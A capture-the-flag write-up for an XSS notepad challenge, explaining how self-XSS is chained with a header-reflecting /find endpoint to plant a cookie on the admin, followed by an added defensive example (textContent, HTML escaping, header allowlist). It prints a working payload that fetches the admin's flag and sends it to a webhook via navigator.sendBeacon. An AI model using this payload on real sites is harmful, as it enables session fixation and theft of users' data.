Tags: xss

Rating:

In this challenge the user's note is inserted into the HTML document using innerHTML, and no sanitization is done on the backend. So a user can insert arbitrary HTML and get XSS. But this is just a self-XSS. To get XSS on the admin side, we can use the /find API to set a Set-Cookie header and make the admin use our own cookie. The final payload is:
```html
<script>
// Set cookie with path=/get so it doesn't delete the existing admin cookie
window.open(`http://chall.notepad1.gq:1111/find?startsWith=d&debug=y&Set-Cookie=id=${cookie}%3B%20path=/get`)
</script>
<script>
// Delete the cookie set by you and then retrieve admin's flag
window.open("http://chall.notepad1.gq:1111", name=`document.cookie='id=${cookie}; expires=Thu, 01 Jan 1970 00:00:00 UTC;path=/get;';document.cookie=x;fetch('/get').then(response=>response.text()).then(data=>navigator.sendBeacon('${webhook}',data));`)
</script>
```
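The two bugs the writeup chains are (1) a note rendered with innerHTML and (2) a /find endpoint that turns query parameters into response headers, including Set-Cookie. Below is an added example of the defensive fixes for both, written by the editor and not taken from the challenge's code or the writeup; the function names, the `ALLOWED_DEBUG_HEADERS` allowlist and the query object shape are assumptions about how such a server might be structured.

```javascript
// Added example (not the challenge's own code): closing both issues from the writeup.

// 1a. Browser side: a note is text, so assign it to textContent, never innerHTML.
//     Markup in the note is then displayed literally instead of being parsed.
function renderNoteSafely(element, note) {
  element.textContent = String(note);
  return element;
}

// 1b. Server/template side: if the note must be embedded in HTML, escape the
//     five characters that can open a tag, attribute or entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 2. The /find "debug" feature reflected arbitrary query parameters as response
//    headers, which is how ?Set-Cookie=... planted a cookie in the admin's browser.
//    Only copy headers from an explicit allowlist (assumed name below) and drop any
//    value containing CR/LF so a single value cannot split into extra headers.
const ALLOWED_DEBUG_HEADERS = new Set(['x-debug-query']);

function buildResponseHeaders(query) {
  const headers = {};
  for (const [name, value] of Object.entries(query)) {
    const lower = name.toLowerCase();
    if (!ALLOWED_DEBUG_HEADERS.has(lower)) continue; // rejects set-cookie, location, ...
    if (/[\r\n]/.test(String(value))) continue;       // header injection attempt
    headers[lower] = String(value);
  }
  return headers;
}

// Constructed sample inputs, run when the file is executed directly.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(escapeHtml('<img src=x onerror=alert(1)>'));
  console.log(buildResponseHeaders({ 'Set-Cookie': 'id=attacker; path=/get', 'X-Debug-Query': 'd' }));
}
```

With these in place the stored note can no longer execute as markup, and the /find endpoint cannot be used to attach a Set-Cookie header to a response, so the cookie-swap step of the chain has no effect.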